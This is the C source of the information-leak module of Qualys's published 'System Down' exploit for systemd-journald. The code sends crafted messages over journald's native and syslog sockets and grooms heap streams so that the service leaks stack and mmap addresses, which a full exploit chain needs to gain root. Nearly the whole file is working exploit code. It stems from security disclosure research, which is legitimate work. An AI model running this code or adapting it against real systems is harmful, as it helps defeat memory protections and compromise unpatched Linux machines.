/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

#include "infoleak.h"
#include "journald.h"
#include "macro.h"
#include "target.h"

static size_t n_filler_streams;
static stream_t filler_streams[32];

static void
initialize_filler_streams(void)
{
    static struct {
        size_t n_filler_streams;
        unsigned samples, failures;
    } best;

    if (n_filler_streams) die();
    memset(filler_streams, -1, sizeof(filler_streams));
    for (n_filler_streams = 8; n_filler_streams <= ELEMENTSOF(filler_streams); n_filler_streams++) {
        printf("n_filler_streams %zu\n", n_filler_streams);

        unsigned samples, failures;
        for (samples = failures = 0; failures <= 1; samples++) {
            if (samples >= 16) return;

            address_t addresses[] = {
                { .offset = -1 },
                { .offset = 0 },
                { .offset = 1 },
            };
            restart_journald();
            infoleak(addresses, ELEMENTSOF(addresses), 0, target_mmap_threshold_max());

            if (is_mmap_address(addresses[0].value) &&
                is_transport_address(addresses[1].value) &&
                is_stack_address(addresses[2].value)) continue;

            failures++;
        }
        if (failures != 2) die();

        if (samples > best.samples) {
            best.samples = samples;
            best.failures = failures;
            best.n_filler_streams = n_filler_streams;
        }
    }

    printf("n_filler_streams %zu (samples %u failures %u)\n",
        best.n_filler_streams, best.samples, best.failures);
    if (best.failures > best.samples / 2) die();
    n_filler_streams = best.n_filler_streams;
    if (!n_filler_streams) die();
}

static void
open_filler_streams(void)
{
    if (n_filler_streams < 1) die();
    if (n_filler_streams > ELEMENTSOF(filler_streams)) die();

    size_t i;
    for (i = 0; i < ELEMENTSOF(filler_streams); i++) {
        if (filler_streams[i].fd != -1) die();
        if (i >= n_filler_streams) continue;
        filler_streams[i] = open_stdout_stream();
    }
}

static void
close_filler_streams(void)
{
    if (n_filler_streams < 1) die();
    if (n_filler_streams > ELEMENTSOF(filler_streams)) die();

    size_t i;
    for (i = 0; i < ELEMENTSOF(filler_streams); i++) {
        if (filler_streams[i].fd <= -1) {
            if (filler_streams[i].fd != -1) die();
            if (i < n_filler_streams) die();
            continue;
        }
        if (i >= n_filler_streams) die();
        close_stdout_stream(filler_streams[i]);
    }
    memset(filler_streams, -1, sizeof(filler_streams));
}

static size_t n_iovec_fields;
static size_t n_iovec_extra_fields;
static size_t lowest_stack_offset;

size_t
infoleak_n_iovec_fields(void)
{
    if (!n_iovec_fields) die();
    return n_iovec_fields;
}

size_t
infoleak_n_iovec_extra_fields(void)
{
    if (!n_iovec_extra_fields) die();
    return n_iovec_extra_fields;
}

ssize_t
infoleak_lowest_stack_offset(void)
{
    if (lowest_stack_offset <= 0) die();
    if (lowest_stack_offset >= SSIZE_MAX) die();
    return lowest_stack_offset;
}

static void
initialize_stack_distances(void)
{
    if (n_iovec_extra_fields) die();
    if (lowest_stack_offset) die();

    const size_t n_addresses = 1 + N_IOVEC_META_FIELDS + 0 + 0;
    struct {
        int in_stack;
        intptr_t value;
    } distances[n_addresses];
    memset(distances, -1, sizeof(distances));

    size_t i;
    unsigned try;
    for (try = 1; ; try++) {
        if (try > 100) die();

        address_t addresses[n_addresses];
        for (i = 0; i < n_addresses; i++) {
            addresses[i].offset = i;
        }
        restart_journald();
        infoleak(addresses, n_addresses, 0, target_mmap_threshold_max());

        if (!is_transport_address(addresses[0].value)) continue;
        const uintptr_t reference = addresses[1].value;
        if (!is_stack_address(reference)) continue;

        bool missing_stack_distance = false;
        for (i = 2; i < n_addresses; i++) {
            if (n_iovec_extra_fields && i >= n_iovec_extra_fields) break;
            const uintptr_t address = addresses[i].value;

            if (is_valid_address(address)) {
                if (is_stack_address(address)) {
                    const intptr_t distance = address - reference;
                    if (distances[i].in_stack == -1) {
                        distances[i].in_stack = true;
                        distances[i].value = distance;
                    } else {
                        if (distances[i].in_stack != true) die();
                        if (distances[i].value != distance) die();
                    }
                } else {
                    if (distances[i].in_stack == -1) {
                        distances[i].in_stack = false;
                    } else {
                        if (distances[i].in_stack != false) die();
                    }
                }
            }

            if (distances[i-0].in_stack != true && i >= 2 + 3 &&
                distances[i-1].in_stack == true &&
                distances[i-2].in_stack == true &&
                distances[i-3].in_stack == true) {
                const intptr_t mach = distances[i-1].value;
                const intptr_t boot = distances[i-2].value;
                const intptr_t time = distances[i-3].value;
                if (time < mach && mach - time >= 1600 &&
                    mach < boot && boot - mach == sizeof("_MACHINE_ID=") + 32) {
                    if (n_iovec_extra_fields && n_iovec_extra_fields != i + 1) die();
                    n_iovec_extra_fields = i + 1;
                    if (distances[i].in_stack == -1) {
                        distances[i].in_stack = false;
                    } else {
                        if (distances[i].in_stack != false) die();
                    }
                }
            }

            if (distances[i].in_stack == -1) {
                missing_stack_distance = true;
            }
        }
        if (missing_stack_distance) continue;
        if (n_iovec_extra_fields) break;
    }
    if (n_iovec_extra_fields < 6) die();
    printf("n_iovec_extra_fields %zu\n", n_iovec_extra_fields);

    intptr_t lowest_stack_distance = 0;
    for (i = 2; i < n_iovec_extra_fields; i++) {
        if (distances[i].in_stack == false) continue;
        if (distances[i].in_stack != true) die();
        if (distances[i].value <= lowest_stack_distance) {
            if (distances[i].value == lowest_stack_distance) die();
            lowest_stack_distance = distances[i].value;
            lowest_stack_offset = i;
        }
    }
    if (lowest_stack_offset < 2) die();
    printf("lowest_stack_offset %zu\n", lowest_stack_offset);
}

void
initialize_infoleak(void)
{
    if (n_iovec_fields) die();
    initialize_filler_streams();
    if (n_iovec_fields < 2) die();
    printf("n_iovec_fields %zu\n", n_iovec_fields);

    initialize_stack_distances();
}

static uintptr_t
infoleak_internal(const int syslog_fd, const size_t abs_offset)
{
    static char buf[DEFAULT_MMAP_THRESHOLD_MIN];

    if (syslog_fd <= -1) die();
    if (abs_offset <= 1024) die();
    if (abs_offset >= sizeof(buf)) die();

    static char identifier[11 + 1];
    generate_syslog_identifier(identifier, sizeof(identifier));

  {
    static char msg[64];
    const unsigned priority = make_syslog_priority();
    const unsigned msg_len = xsnprintf(msg, sizeof(msg), "<%u>%s:", priority, identifier);
    const size_t buf_len = abs_offset - 1;
    if (buf_len <= msg_len) die();

    memset(buf, ' ', buf_len - msg_len);
    memcpy(buf + buf_len - msg_len, msg, msg_len);
    xwrite(syslog_fd, buf, buf_len);
  }

    static char hdr[64];
    const unsigned hdr_len = xsnprintf(hdr, sizeof(hdr), " %s[%d]: ", identifier, (int)getpid());
    const size_t buf_len = read_from_journal(identifier, buf, sizeof(buf));
    const char * ptr = memmem(buf, buf_len, hdr, hdr_len);
    if (!ptr) die();
    ptr += hdr_len;

    const char * const end = memchr(ptr, '\n', buf + buf_len - ptr);
    if (end != buf + buf_len - 1) return 0;
    const size_t len = end - ptr;

    switch (target_arch()) {
    case TARGET_I386:
        if (len < 3) return 0;
        if (len > 4 + 2) return 0;
        break;
    case TARGET_AMD64:
        if (len != 6) return 0;
        break;
    default:
        die();
    }

    size_t i;
    uintptr_t address = 0;
    for (i = 0; i < len; i++) {
        if (i >= sizeof(address)) break;
        const uintptr_t byte = (unsigned char)ptr[i];
        address |= byte << (i * 8);
    }
    return address;
}

void
infoleak(address_t * const addresses, const size_t n_addresses,
    const size_t binary_item_heap_size, const size_t tempfile_heap_size)
{
    if (!addresses) die();
    if (!n_addresses) die();

    size_t iovec_chunk_size = 0, iovec_min_n = 0, iovec_max_n = 0;
  {
    size_t n, allocated = 0;
    for (n = 1; ; n++) {
        const size_t need = n + 1 + N_IOVEC_META_FIELDS + N_IOVEC_OBJECT_FIELDS + 0;
        if (allocated >= need) {
            iovec_max_n = n;
            continue;
        }
        allocated = MAX(need * 2, 64u / sizeof(struct iovec));
        const size_t chunk_size = request2size(allocated * sizeof(struct iovec));
        if (chunk_size >= DEFAULT_MMAP_THRESHOLD_MIN) break;
        if (chunk_size <= iovec_chunk_size) die();
        iovec_chunk_size = chunk_size;
        iovec_min_n = iovec_max_n = n;
    }
  }
    if (iovec_min_n <= 0) die();
    if (iovec_max_n <= iovec_min_n) die();
    if (iovec_chunk_size <= MINSIZE) die();

    size_t server_chunk_size = 0, server_min_v = 0, server_max_v = 0;
  {
    size_t v;
    for (v = 3 * PAGE_SIZE * 2; ; v++) {
        const size_t need = PAGE_ALIGN(v + 1 + 1);
        const size_t chunk_size = request2size(need * 2 * sizeof(char));
        if (chunk_size > iovec_chunk_size) break;
        if (chunk_size < server_chunk_size) die();
        if (chunk_size > server_chunk_size) {
            server_chunk_size = chunk_size;
            server_min_v = v;
        }
        server_max_v = v;
    }
  }
    if (server_min_v <= 0) die();
    if (server_max_v <= server_min_v) die();
    if (server_chunk_size <= MINSIZE) die();

    server_min_v += (server_max_v - server_min_v) / 2;
  {
    const size_t allocated = PAGE_ALIGN(server_min_v + 1 + 1) * 2;
    if (request2size(allocated * sizeof(char)) != server_chunk_size) die();
    size_t v;
    for (v = server_max_v = server_min_v; ; v++) {
        const size_t need = PAGE_ALIGN(v + 1 + 1);
        if (allocated < need) break;
        server_max_v = v;
    }
  }
    if (server_max_v <= server_min_v) die();

    const size_t iovec_n = iovec_min_n + (iovec_max_n - iovec_min_n) / 2;
    if (n_iovec_fields && n_iovec_fields != iovec_n) die();
    n_iovec_fields = iovec_n;

    const tempfile_t tempfile = open_native_tempfile(false, tempfile_heap_size);
    static char buf[ELF64_SEGMENT_ALIGNMENT];
    size_t i;

  {
    const size_t write_n = iovec_n - !!binary_item_heap_size;
    if (write_n >= sizeof(buf) / NATIVE_ITEM_LEN) die();
    for (i = 0; i < write_n; i++) {
        memcpy(buf + i * NATIVE_ITEM_LEN, NATIVE_ITEM, NATIVE_ITEM_LEN);
    }
    xwrite(tempfile.fd, buf, write_n * NATIVE_ITEM_LEN);
  }

    if (binary_item_heap_size) {
        if (binary_item_heap_size % PAGE_SIZE) die();
        if (binary_item_heap_size < PAGE_SIZE) die();
        const size_t req = binary_item_heap_size - SIZE_SZ - MALLOC_ALIGN_MASK;
        const uint64_t len = req - 2;
        if (len >= sizeof(buf)) die();
        memset(buf, ' ', len);

        xwrite(tempfile.fd, "A\n", 2);
        xwrite(tempfile.fd, &len, sizeof(len));
        xwrite(tempfile.fd, buf, len);
        xwrite(tempfile.fd, "\n", 1);
    }

    if (tempfile_heap_size) {
        if (tempfile_heap_size % PAGE_SIZE) die();
        if (tempfile_heap_size < PAGE_SIZE) die();
        const size_t req = tempfile_heap_size - SIZE_SZ - MALLOC_ALIGN_MASK;
        const size_t temp_size = native_tempfile_size(tempfile);
        if (req >= temp_size) {
            const size_t len = req - temp_size;
            if (len >= sizeof(buf)) die();
            memset(buf, ' ', len);
            if (len >= 2) {
                buf[len-1] = '\n';
                buf[0] = '#';
            }
            if (len) xwrite(tempfile.fd, buf, len);
            if (native_tempfile_size(tempfile) != req) die();
        } else {
            if (!binary_item_heap_size) die();
            if (tempfile_heap_size != ELF64_SEGMENT_ALIGNMENT) die();
        }
    }

    ping_syslog_server();
    open_filler_streams();

    const int native_fd = open_native_connection();
    send_native_tempfile(native_fd, tempfile);
    if (close(tempfile.fd)) die();
  {
    const size_t len = server_min_v;
    if (len >= sizeof(buf)) die();
    if (len <= 2) die();
    memset(buf, ' ', len);
    buf[len-1] = '\n';
    buf[0] = '#';
    xwrite(native_fd, buf, len);
  }
    if (close(native_fd)) die();

    const int syslog_fd = open_syslog_connection();

    for (i = 0; i < n_addresses; i++) {
        const ssize_t rel_offset = addresses[i].offset;
        if (i > 0 && rel_offset <= addresses[i-1].offset) die();
        if (rel_offset <= -(ssize_t)(iovec_n - iovec_min_n)) die();
        if (rel_offset >= +(ssize_t)(iovec_max_n - iovec_n)) die();

        const size_t abs_offset = (iovec_n + rel_offset) * sizeof(struct iovec);
        if (abs_offset <= server_min_v) die();
        if (abs_offset >= server_max_v) die();

        const uintptr_t address = infoleak_internal(syslog_fd, abs_offset);
        if (address && !is_valid_address(address)) die();
        addresses[i].value = address;

        switch (target_arch()) {
        case TARGET_I386:
            printf("%08lx%s", (unsigned long)address, ((i + 1) % 12) ? " " : "\n");
            break;
        case TARGET_AMD64:
            printf("%012lx%s", (unsigned long)address, ((i + 1) % 8) ? " " : "\n");
            break;
        default:
            die();
        }
    }
    if (close(syslog_fd)) die();
    close_filler_streams();
    puts("done.");
}

